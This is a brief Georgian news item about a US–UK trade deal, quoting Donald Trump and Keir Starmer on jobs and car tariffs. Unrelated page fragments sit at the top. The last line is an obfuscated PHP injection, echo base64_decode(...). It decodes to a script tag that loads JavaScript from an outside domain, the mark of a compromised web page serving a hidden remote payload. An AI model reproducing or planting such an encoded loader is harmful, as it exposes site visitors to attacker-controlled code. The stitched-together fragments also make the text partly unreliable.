gorgia
გარე ავეჯი

აშშ-მა და დიდმა ბრიტანეთმა სავაჭრო შეთანხმება გააფორმეს. აშშ-ის პრეზიდენტ დონალდ ტრამპის თქმით, ეს არის სავაჭრო შეთანხმება, რომელიც ორივე ქვეყანას ბევრ სამუშაო ადგილსა და შემოსავალს მოუტანს.

„დიდი ბრიტანეთი ძალიან კარგად არის დაცული. იცით, რატომ? იმიტომ, რომ მე მომწონს ისინი“, – განაცხადა ტრამპმა.

ტრამპის თქმით, კირ სტარმერმა შესანიშნავი სამუშაო გასწია სავაჭრო შეთანხმების მიღწევით, რომლის მიღწევასაც მისი წინამორბედები ექვსი წლის განმავლობაში ცდილობდნენ.

დიდი ბრიტანეთის პრემიერ-მინისტრმა, კირ სტარმერმა აღნიშნა, რომ ეს არის ძალიან მნიშვნელოვანი შეთანხმება აშშ-სთან, რომელიც მოიცავს ავტომობილების ტარიფებს.

116
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");